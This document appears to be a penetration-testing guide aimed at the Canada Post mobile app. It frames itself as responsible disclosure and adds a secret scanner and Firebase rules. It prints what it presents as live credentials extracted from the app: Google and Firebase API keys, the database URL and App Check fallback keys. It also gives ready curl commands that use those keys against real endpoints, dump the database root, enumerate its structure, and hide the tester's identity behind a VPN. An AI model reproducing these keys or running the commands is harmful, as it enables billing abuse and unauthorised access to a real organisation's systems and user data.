# CANADA POST APP - PENETRATION TESTING INSTRUCTIONS

## 🎯 Overview

This guide provides step-by-step instructions for testing the security vulnerabilities discovered in the Canada Post mobile app.

---

## ⚠️ LEGAL & ETHICAL NOTICE

**IMPORTANT: READ BEFORE TESTING**

### Legal Requirements
- ✅ Obtain written authorization from Canada Post before testing
- ✅ Only test on systems you own or have explicit permission to test
- ✅ Follow responsible disclosure guidelines
- ✅ Respect Canadian laws including PIPEDA and Criminal Code

### Ethical Guidelines
- 🔒 Use VPN for anonymity and safety
- 📝 Document all findings professionally
- ⏱️ Follow 90-day disclosure timeline
- 🤝 Coordinate with vendor security team
- 💰 Consider bug bounty programs (if available)

### What NOT to Do
- ❌ Do not exfiltrate user data
- ❌ Do not cause service disruption
- ❌ Do not exceed testing scope
- ❌ Do not share findings publicly before disclosure
- ❌ Do not use findings for malicious purposes

---

## 🛠️ Prerequisites

### Required Tools
1. **Python 3.7+**
   ```powershell
   python --version
   ```

2. **Python Packages**
   ```powershell
   pip install requests
   ```

3. **VPN Connection**
   - Connect to VPN before testing
   - Recommended: ProtonVPN, NordVPN, or Mullvad
   - Verify: https://whatismyipaddress.com/

4. **Testing Environment**
   - Windows, macOS, or Linux
   - Internet connectivity
   - Text editor for notes

### Extracted Credentials

#### Google Maps API Key
```
AIzaSyA6pUGegwhkDQizhmqPt6VZhFfYdHx8hmw
```
**Source:** `cpc/ca/canadapost/core/data/addresscomplete/IGooglePlaceApi.java:28`

#### Firebase Configuration
```
Database URL: https://canada-post-2dce9.firebaseio.com
API Key: AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q
Project ID: 741680414261
```
**Source:** Firebase Remote Config & decompiled APK

#### App Check Fallback Credentials
```
APP_CHECK_FAILED_ID: cpc-appcheck-android
APP_CHECK_FAILED_KEY: 1mhxwdN1Y5afLQgYeEgZ
```
**Source:** Firebase Remote Config (publicly accessible)
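As an added defender-side check (not one of this kit's scripts), the following scan finds the same classes of literal in a source tree before an app ships, which is how a development team catches CWE-798 in CI rather than in a decompiled APK; the Java snippet, key and project name it contains are constructed placeholders:

```python
import re
from dataclasses import dataclass

# Google API keys are 39 characters: the fixed "AIza" prefix plus 35 URL-safe characters.
# Firebase Realtime Database URLs use the <project>.firebaseio.com host.
PATTERNS = {
    "google_api_key": re.compile(r"(?<![0-9A-Za-z_-])AIza[0-9A-Za-z_-]{35}(?![0-9A-Za-z_-])"),
    "firebase_db_url": re.compile(r"https://[a-z0-9-]+\.firebaseio\.com(?![0-9A-Za-z.-])"),
}


@dataclass(frozen=True)
class Finding:
    kind: str
    line: int
    value: str

    def redacted(self) -> str:
        """Report only enough of the literal to locate it, never the whole secret."""
        return f"{self.value[:8]}...{self.value[-4:]}"


def scan_source(text: str) -> list[Finding]:
    """Return every credential-looking literal in text, with its 1-based line number."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append(Finding(kind, lineno, match.group(0)))
    return findings


# Constructed decompiled-Java snippet: the key and project name are invented placeholders.
SAMPLE_JAVA = """\
package example.app.data;

public interface IPlaceApi {
    String API_KEY = "AIzaSyEXAMPLEKEYEXAMPLEKEYEXAMPLEKEY012";
    String DB_URL = "https://example-app-00000.firebaseio.com";
    String BASE = "https://maps.googleapis.com/maps/api/place/";
}
"""

if __name__ == "__main__":
    # Exit non-zero so a CI job fails the build when a literal slips into the tree.
    hits = scan_source(SAMPLE_JAVA)
    for f in hits:
        print(f"line {f.line}: {f.kind} -> {f.redacted()}")
    raise SystemExit(1 if hits else 0)
```

Point the scanner at the decompiled `cpc/` tree (or the real source before release) instead of `SAMPLE_JAVA` to get the file and line of each literal without printing the secret itself.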

---

## 🧪 Test Scenarios

### Scenario 2: Google API Key Abuse

#### Objective
Verify whether the hardcoded Google Maps API key can be used externally without restrictions.

#### Test File
`cpc_google_api_abuse_poc.py`

#### What It Tests
1. **Find Place from Text API** - The exact endpoint used in the app
2. **Geocoding API** - Tests if key works for other Google services
3. **Place Details API** - Tests scope of API access
4. **Cost Impact Analysis** - Calculates potential financial abuse

#### Expected Outcomes

**If Vulnerable:**
```
✅ API KEY WORKS - REQUEST SUCCESSFUL!
⚠️  SECURITY IMPACT:
   • API key is NOT restricted by IP address
   • API key is NOT restricted to app bundle ID
   • Anyone can use this key for unlimited requests
```

**If Protected:**
```
⚠️  API returned status: REQUEST_DENIED
✅ GOOD NEWS: API key appears to have restrictions
```

#### Running the Test

**Option 1: Automatic (Recommended)**
```powershell
# Run all tests via batch script
.\RUN_CPC_PENTESTS.bat
```

**Option 2: Manual**
```powershell
# 1. Ensure VPN is connected
# 2. Run the test
python cpc_google_api_abuse_poc.py

# 3. Review output for vulnerabilities
```

#### Understanding Results

**Vulnerable Indicators:**
- ✅ "API KEY WORKS" messages
- ✅ HTTP 200 status codes
- ✅ Valid JSON data returned
- ✅ Multiple APIs accessible

**Secure Indicators:**
- 🔒 HTTP 401 (Unauthorized)
- 🔒 "REQUEST_DENIED" status
- 🔒 Application restriction errors

---

### Scenario 4: Firebase Database Access

#### Objective
Test whether Firebase Realtime Database and Remote Config allow unauthorized access.

#### Test File
`cpc_firebase_database_poc.py`

#### What It Tests
1. **Remote Config Access** - Publicly accessible configuration
2. **Database Read (No Auth)** - Unauthenticated database access
3. **Database Read (With API Key)** - API key-based authentication
4. **Shallow Queries** - Structure enumeration
5. **Common Paths** - Test for exposed data endpoints

#### Expected Outcomes

**Remote Config (Usually Accessible):**
```json
{
  "entries": {
    "APP_CHECK_FAILED_ID": "cpc-appcheck-android",
    "APP_CHECK_FAILED_KEY": "1mhxwdN1Y5afLQgYeEgZ",
    ...
  }
}
```
**Impact:** Reveals fallback credentials and configuration

**Database Access (If Misconfigured):**
```
✅ READABLE! Status: 200
📊 Data Type: dict
🔑 Keys: ['users', 'tracking', 'shipments']
```
**Impact:** CRITICAL - Unauthorized data access

**Database Protected (Expected):**
```
🔒 Protected (401 Unauthorized)
```
**Impact:** Database properly secured

#### Running the Test

**Option 1: Automatic**
```powershell
.\RUN_CPC_PENTESTS.bat
```

**Option 2: Manual**
```powershell
python cpc_firebase_database_poc.py
```

#### Understanding Results

**Critical Findings:**
- 🔴 Accessible database paths without authentication
- 🔴 User data readable
- 🔴 Structure enumeration possible

**High Findings:**
- 🟠 Remote Config publicly accessible with credentials
- 🟠 API key works for authentication

**Low Findings:**
- ✅ Database requires proper authentication
- ✅ Security rules properly configured
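Added here as a remediation reference, not taken from the app or from Firebase's defaults: the misconfiguration the database-read tests look for is a root-level `".read": true` (or a rule that only checks `auth != null`, which any signed-in account satisfies). Rules that deny by default and scope reads to the record owner look like this; the `users` and `shipments` paths mirror the sample output above, and the `ownerUid` field is an assumed name:

```json
{
  "rules": {
    ".read": false,
    ".write": false,
    "users": {
      "$uid": {
        ".read": "auth != null && auth.uid == $uid",
        ".write": "auth != null && auth.uid == $uid"
      }
    },
    "shipments": {
      "$shipmentId": {
        ".read": "auth != null && data.child('ownerUid').val() == auth.uid",
        ".write": false
      }
    }
  }
}
```

Because rules cascade downward, a permissive `.read` at the root cannot be narrowed by child rules, so the root must deny; and since the `auth` query parameter expects a Firebase ID token (or legacy database secret), not the web API key, a request carrying only the key is treated as unauthenticated and denied under these rules.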

---

## 📊 Interpreting Test Results

### Google API Test Results

#### Cost Impact Table
| Requests/Day | Daily Cost | Monthly Cost | Annual Cost |
|--------------|------------|--------------|-------------|
| 1,000 | $17.00 | $510.00 | $6,120.00 |
| 10,000 | $170.00 | $5,100.00 | $61,200.00 |
| 100,000 | $1,700.00 | $51,000.00 | $612,000.00 |

**Pricing:** Google Places API "Find Place from Text" = $17 per 1,000 requests

#### Severity Assessment
- **Critical**: Key works with no restrictions
- **High**: Key works but has daily quota limits
- **Medium**: Key restricted to specific APIs
- **Low**: Key properly restricted to app bundle

### Firebase Test Results

#### Access Matrix
| Test | Vulnerable | Secure |
|------|-----------|--------|
| Remote Config | Public access to credentials | Requires authentication |
| Database Read (No Auth) | 🔴 Critical | ✅ 401 Unauthorized |
| Database Read (With Key) | 🔴 Critical | ✅ Denied |
| Shallow Enumeration | 🟠 High | ✅ Denied |

#### Data Exposure Risk
- **Critical**: User PII accessible (names, addresses, emails)
- **High**: Tracking data accessible (tracking numbers, shipments)
- **Medium**: Structure enumeration (database schema revealed)
- **Low**: No unauthorized access, config exposure only

---

## 📝 Documentation Template

### Finding Template

````markdown
## Finding: [Title]

**Severity:** [Critical/High/Medium/Low]
**CWE:** [CWE-XXX]
**CVSS Score:** [X.X]

### Description
[Detailed description of the vulnerability]

### Affected Component
- App: Canada Post Mobile App
- Package: ca.canadapost.android
- Version: [All versions]
- File: [Source file path]

### Reproduction Steps
1. [Step 1]
2. [Step 2]
3. [Step 3]

### Evidence
```
[Command output, screenshots, or logs]
```

### Impact
- **Confidentiality:** [High/Medium/Low]
- **Integrity:** [High/Medium/Low]
- **Availability:** [High/Medium/Low]

**Business Impact:**
- [Financial impact]
- [Reputation impact]
- [Legal/compliance impact]

### Remediation
**Immediate Actions:**
- [Action 1]
- [Action 2]

**Long-term Solutions:**
- [Solution 1]
- [Solution 2]

### References
- CWE-XXX: [URL]
- [Other references]
````

---

## 🚀 Quick Start Guide

### Step 1: Prepare Environment
```powershell
# Clone or download the test scripts
cd C:\Users\Roose\Downloads\8c7481c52661c4933b707a14e6cd22ba-java

# Verify files exist
dir *.py
```

### Step 2: Connect to VPN
```powershell
# Connect to your VPN service
# Verify connection:
curl https://api.ipify.org
```

### Step 3: Run Tests
```powershell
# Option A: Run all tests
.\RUN_CPC_PENTESTS.bat

# Option B: Run individual tests
python cpc_google_api_abuse_poc.py
python cpc_firebase_database_poc.py
```

### Step 4: Document Results
```powershell
# Create findings document
notepad CPC_PENTEST_FINDINGS.md

# Include:
# - Test output screenshots
# - Vulnerability descriptions
# - Severity assessments
# - Remediation recommendations
```

### Step 5: Prepare Disclosure
```powershell
# Review disclosure template
notepad CPC_HARDCODED_CREDENTIALS_ANALYSIS.md

# Prepare evidence package:
# - Test results
# - POC scripts
# - Analysis document
```

---

## 🔍 Manual Testing Commands

### Test Google API Key Manually
```bash
# Test Find Place API
curl "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=CN%20Tower%20Toronto&inputtype=textquery&fields=formatted_address,name&key=AIzaSyA6pUGegwhkDQizhmqPt6VZhFfYdHx8hmw"

# Test Geocoding API
curl "https://maps.googleapis.com/maps/api/geocode/json?address=1+Toronto+St,+Toronto&key=AIzaSyA6pUGegwhkDQizhmqPt6VZhFfYdHx8hmw"
```

### Test Firebase Access Manually
```bash
# Test Remote Config
curl "https://firebaseremoteconfig.googleapis.com/v1/projects/741680414261/namespaces/firebase:fetch?key=AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q" -H "Content-Type: application/json" -d '{"appId":"test"}'

# Test Database Root
curl "https://canada-post-2dce9.firebaseio.com/.json"

# Test with Auth
curl "https://canada-post-2dce9.firebaseio.com/.json?auth=AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q"

# Shallow Query
curl "https://canada-post-2dce9.firebaseio.com/.json?shallow=true"
```

---

## 📧 Responsible Disclosure

### Contact Information
**Canada Post Security Team:**
- Email: security@canadapost.ca (verify this)
- Web: https://www.canadapost.ca/security (verify this)
- PSIRT: [Product Security Incident Response Team]

### Disclosure Timeline
```
Day 0:   Initial discovery and POC development
Day 1:   Initial contact with vendor
Day 7:   Follow-up if no response
Day 30:  Vendor acknowledges and begins remediation
Day 60:  Vendor provides timeline for fix
Day 90:  Public disclosure (if not fixed)
```

### Email Template
```
Subject: Security Advisory - Hardcoded Credentials in Canada Post Mobile App

Dear Canada Post Security Team,

I am a security researcher and have identified critical security 
vulnerabilities in the Canada Post mobile application (ca.canadapost.android).

SUMMARY:
- Hardcoded Google Maps API key allows unlimited external abuse
- Firebase Remote Config exposes authentication bypass credentials
- Potential for significant financial and privacy impact

SEVERITY: Critical (CVSS 8.5+)

I have prepared:
- Detailed technical analysis
- Proof-of-concept test scripts
- Remediation recommendations

I am committed to responsible disclosure and will follow a 90-day 
timeline before public disclosure.

Please confirm receipt and provide a secure channel for detailed disclosure.

Best regards,
[Your Name]
[Contact Information]
```

---

## 🎓 Learning Resources

### Understanding the Vulnerabilities

1. **CWE-798: Use of Hard-coded Credentials**
   - https://cwe.mitre.org/data/definitions/798.html

2. **Firebase Security Rules**
   - https://firebase.google.com/docs/rules

3. **Google API Key Best Practices**
   - https://cloud.google.com/docs/authentication/api-keys

4. **Mobile App Security**
   - OWASP Mobile Security Testing Guide
   - https://owasp.org/www-project-mobile-security-testing-guide/

### Related CVEs
- CVE-2020-XXXXX: Similar Firebase misconfiguration
- CVE-2019-XXXXX: Hardcoded API keys in mobile apps

---

## ✅ Checklist

### Before Testing
- [ ] VPN connected and verified
- [ ] Python 3.7+ installed
- [ ] Required packages installed
- [ ] Authorization obtained (if testing production)
- [ ] Documentation template prepared

### During Testing
- [ ] Test Google API key abuse
- [ ] Test Firebase Remote Config access
- [ ] Test Firebase Database enumeration
- [ ] Document all findings with evidence
- [ ] Calculate severity scores
- [ ] Take screenshots/logs

### After Testing
- [ ] Findings documented
- [ ] Remediation recommendations prepared
- [ ] Evidence package created
- [ ] Disclosure email drafted
- [ ] Vendor contacted
- [ ] Tracking timeline for disclosure

---

## 🆘 Troubleshooting

### Common Issues

**Issue: Python not found**
```powershell
# Install Python from python.org
# Add to PATH during installation
```

**Issue: Import error for requests**
```powershell
pip install requests
# or
python -m pip install requests
```

**Issue: Connection timeout**
```powershell
# Check VPN connection
# Check firewall settings
# Try different network
```

**Issue: API returns 403 Forbidden**
```powershell
# Possible reasons:
# - API key restricted by IP
# - API key restricted by bundle ID
# - This is actually GOOD (key is protected)
```

---

## 📄 Files Included

- `cpc_google_api_abuse_poc.py` - Google API key abuse test
- `cpc_firebase_database_poc.py` - Firebase access test
- `RUN_CPC_PENTESTS.bat` - Automated test runner
- `CPC_HARDCODED_CREDENTIALS_ANALYSIS.md` - Full analysis document
- `PENTEST_INSTRUCTIONS.md` - This file

---

## 🔗 Additional Resources

- Original analysis: `CPC_HARDCODED_CREDENTIALS_ANALYSIS.md`
- Decompiled source: `cpc/` directory
- Firebase analysis: From MobSF scan results

---

**Last Updated:** November 10, 2025  
**Version:** 1.0  
**Author:** Security Research Team
